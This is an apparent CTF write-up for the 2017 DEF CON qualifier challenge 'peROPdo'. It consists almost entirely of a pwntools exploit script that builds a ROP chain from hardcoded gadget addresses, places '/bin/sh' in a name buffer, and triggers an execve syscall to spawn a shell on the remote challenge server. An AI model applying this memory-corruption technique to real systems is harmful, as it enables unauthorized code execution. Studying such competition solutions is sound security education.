2017 DEFCON --- peROPdo writeup

Writeup
, 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from pwn import *

#context.terminal = ['tmux', 'split-window', '-h']
context.log_level = "debug"

#r = process("./peropdo")
r = remote("peropdo_bb53b90b35dba86353af36d3c6862621.quals.shallweplayaga.me",80)

def attach():
    gdb.attach(r,'''
    b *0x08048FD0
    b *0x08048B4F
    c
            ''')
    raw_input("debug")#0x1022
    #cat /proc/sys/kernel/yama/ptrace_scope
    #开启echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
    #关闭echo 1 | sudo tee /proc/sys/kernel/yama/ptrace_scope
    #C-b o 在小窗口中切换
    #http://blog.chinaunix.net/uid-26285146-id-3252286.html

#attach()

int_0x80 = 0x08049551
pop_eax_ret = 0x80e3525
pop_ebx_ret = 0x0804b1c9
pop_ecx_ret = 0x080e5ee1
pop_edx_ret = 0x0806f2fa
name_addr = 0x080ECFC0
sub_eax_1_pop_ebx_ret = 0x08054cfa

pop_edx_ecx_ebx_ret = 0x0806f320
srop = 0x807c069

r.recvuntil("name?")
seed = p32(0xea9ad2fe)
name = seed
name += "\x00"*10
name += p32(name_addr + 4 + 20)
name += "\x00"*(10-4)
name += "/bin/sh"
name += "\x00"*(52-20-7)
name += p32(pop_eax_ret)
name += p32(0x0e)
name += p32(sub_eax_1_pop_ebx_ret)
name += p32(name_addr + 4 + 20)
name += p32(sub_eax_1_pop_ebx_ret)
name += p32(name_addr + 4 + 20)
name += p32(sub_eax_1_pop_ebx_ret)
name += p32(name_addr + 4 + 20)
name += p32(pop_ecx_ret)#0x0
name += p32(name_addr + 4 + 10)
name += p32(pop_edx_ret)#0x0
name += p32(name_addr + 4)
name += p32(int_0x80)



r.sendline(name)
r.recvuntil("roll?")
r.sendline("23")
r.recvuntil("again?")
r.sendline("n")

r.interactive()